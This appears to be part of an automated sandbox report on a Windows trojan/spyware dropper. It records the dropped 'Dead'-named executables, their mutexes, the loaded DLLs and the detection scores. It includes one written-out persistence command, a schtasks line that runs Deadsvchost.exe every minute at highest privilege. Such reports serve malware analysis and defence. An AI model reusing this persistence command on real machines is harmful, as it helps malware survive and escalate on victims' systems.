                        Source: 4.2.1.exe.2ff5330.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 4.2.1.exe.2ff5330.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 4.2.1.exe.2ff5330.2.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                        Source: Deadsvchost.exe.6.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                        Source: Deadsvchost.exe.6.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                        Source: Deadsvchost.exe.6.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: Deadsvchost.exe.6.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: DeadXClient.exe.4.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: DeadXClient.exe.4.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: DeadROOTkit.exe.4.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: DeadROOTkit.exe.4.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 4.2.1.exe.2ff5330.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 4.2.1.exe.2ff5330.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@32/116@3/3
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABE1ED0 GetLastError,FormatMessageW,2_2_00007FF6FABE1ED0
                        Source: C:\Users\Public\DeadCodeRootKit.exeCode function: 8_2_00151672 SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,8_2_00151672
                        Source: C:\Users\Public\DeadCodeRootKit.exeCode function: 8_2_001517A6 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,8_2_001517A6
                        Source: C:\Users\user\AppData\Local\Temp\1.exeFile created: C:\Users\Public\DeadXClient.exeJump to behavior
                        Source: C:\Users\Public\Deadsvchost.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3660:120:WilError_03
                        Source: C:\Users\user\AppData\Local\Temp\1.exeMutant created: \Sessions\1\BaseNamedObjects\wxpsOI0qOWugh4cNc
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6432:120:WilError_03
                        Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
                        Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
                        Source: C:\Users\Public\DeadROOTkit.exeMutant created: \Sessions\1\BaseNamedObjects\pPl3jDvgHvU1lllp
                        Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_03
                        Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
                        Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4188
                        Source: C:\Users\Public\DeadXClient.exeMutant created: \Sessions\1\BaseNamedObjects\tnsxJywWJMkQgZ7E
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeFile created: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeJump to behavior
                        Source: aoKTzGQSRP.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: aoKTzGQSRP.exeReversingLabs: Detection: 76%
                        Source: CMaker 2.0.exeString found in binary or memory: id-cmc-addExtensions
                        Source: CMaker 2.0.exeString found in binary or memory: set-addPolicy
                        Source: CMaker 2.0.exeString found in binary or memory: --help
                        Source: CMaker 2.0.exeString found in binary or memory: --help
                        Source: CMaker 2.0.exeString found in binary or memory: when smaller code objects and pyc files are desired as well as suppressing the extra visual location indicators when the interpreter displays tracebacks. These variables have equivalent command-line parameters (see --help for details): PYTHONDEBUG
                        Source: CMaker 2.0.exeString found in binary or memory: when smaller code objects and pyc files are desired as well as suppressing the extra visual location indicators when the interpreter displays tracebacks. These variables have equivalent command-line parameters (see --help for details): PYTHONDEBUG
                        Source: CMaker 2.0.exeString found in binary or memory: can't send non-None value to a just-started generator
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_0-52
                        Source: unknownProcess created: C:\Users\user\Desktop\aoKTzGQSRP.exe "C:\Users\user\Desktop\aoKTzGQSRP.exe"
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeProcess created: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe "C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe"
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeProcess created: C:\Users\user\AppData\Local\Temp\1.exe "C:\Users\user\AppData\Local\Temp\1.exe"
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeProcess created: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe "C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess created: C:\Users\Public\DeadXClient.exe "C:\Users\Public\DeadXClient.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess created: C:\Users\Public\DeadROOTkit.exe "C:\Users\Public\DeadROOTkit.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess created: C:\Users\Public\DeadCodeRootKit.exe "C:\Users\Public\DeadCodeRootKit.exe"
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\DeadXClient.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 492 -p 4188 -ip 4188
Source: C:\Users\Public\DeadROOTkit.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4188 -s 1660
Source: unknown | Process created: C:\Users\Public\Deadsvchost.exe C:\Users\Public\Deadsvchost.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{ac6bab9f-cf5e-448a-be82-36c64370aff3}
Source: unknown | Process created: C:\Users\Public\Deadsvchost.exe "C:\Users\Public\Deadsvchost.exe"
Source: unknown | Process created: C:\Users\Public\Deadsvchost.exe "C:\Users\Public\Deadsvchost.exe"
Source: C:\Windows\System32\dllhost.exe | Process created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
Source: C:\Users\user\Desktop\aoKTzGQSRP.exe | Process created: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe "C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe"
Source: C:\Users\user\Desktop\aoKTzGQSRP.exe | Process created: C:\Users\user\AppData\Local\Temp\1.exe "C:\Users\user\AppData\Local\Temp\1.exe"
Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Process created: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe "C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe"
Source: C:\Users\user\AppData\Local\Temp\1.exe | Process created: C:\Users\Public\DeadXClient.exe "C:\Users\Public\DeadXClient.exe"
Source: C:\Users\user\AppData\Local\Temp\1.exe | Process created: C:\Users\Public\DeadROOTkit.exe "C:\Users\Public\DeadROOTkit.exe"
Source: C:\Users\user\AppData\Local\Temp\1.exe | Process created: C:\Users\Public\DeadCodeRootKit.exe "C:\Users\Public\DeadCodeRootKit.exe"
Source: C:\Users\Public\DeadXClient.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{ac6bab9f-cf5e-448a-be82-36c64370aff3}
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 492 -p 4188 -ip 4188
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4188 -s 1660
Source: C:\Windows\System32\WerFault.exe | Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\aoKTzGQSRP.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\aoKTzGQSRP.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\aoKTzGQSRP.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\aoKTzGQSRP.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\aoKTzGQSRP.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\aoKTzGQSRP.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\aoKTzGQSRP.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\aoKTzGQSRP.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\aoKTzGQSRP.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\aoKTzGQSRP.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\aoKTzGQSRP.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\aoKTzGQSRP.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\aoKTzGQSRP.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\aoKTzGQSRP.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\aoKTzGQSRP.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\aoKTzGQSRP.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\aoKTzGQSRP.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\aoKTzGQSRP.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\aoKTzGQSRP.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\aoKTzGQSRP.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\aoKTzGQSRP.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\aoKTzGQSRP.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Section loaded: libffi-8.dll
Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Section loaded: libcrypto-3.dll
Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Section loaded: libssl-3.dll
Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: mscoree.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: apphelp.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: version.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: uxtheme.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: sspicli.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: cryptsp.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: rsaenh.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: cryptbase.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: windows.storage.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: wldp.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: propsys.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: profapi.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: edputil.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: urlmon.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: iertutil.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: srvcli.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: netutils.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: wintypes.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: appresolver.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: bcp47langs.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: slc.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: userenv.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: sppc.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: sxs.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: mpr.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: scrrun.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: linkinfo.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: ntshrui.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: cscapi.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: mswsock.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: dnsapi.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: iphlpapi.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: rasadhlp.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: wbemcomn.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: amsi.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: avicap32.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: msvfw32.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: winmm.dll
Source: C:\Users\Public\DeadXClient.exe | Section loaded: pdh.dll
Source: C:\Users\Public\DeadROOTkit.exe | Section loaded: mscoree.dll
Source: C:\Users\Public\DeadROOTkit.exe | Section loaded: apphelp.dll
Source: C:\Users\Public\DeadROOTkit.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\Public\DeadROOTkit.exe | Section loaded: version.dll
Source: C:\Users\Public\DeadROOTkit.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\DeadROOTkit.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\DeadROOTkit.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\DeadROOTkit.exe | Section loaded: uxtheme.dll
Source: C:\Users\Public\DeadROOTkit.exe | Section loaded: sspicli.dll
Source: C:\Users\Public\DeadROOTkit.exe | Section loaded: cryptsp.dll
Source: C:\Users\Public\DeadROOTkit.exe | Section loaded: rsaenh.dll
Source: C:\Users\Public\DeadROOTkit.exe | Section loaded: cryptbase.dll
Source: C:\Users\Public\DeadROOTkit.exe | Section loaded: wbemcomn.dll
Source: C:\Users\Public\DeadROOTkit.exe | Section loaded: amsi.dll
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: mscoree.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: apphelp.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: version.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: vcruntime140_clr0400.dll
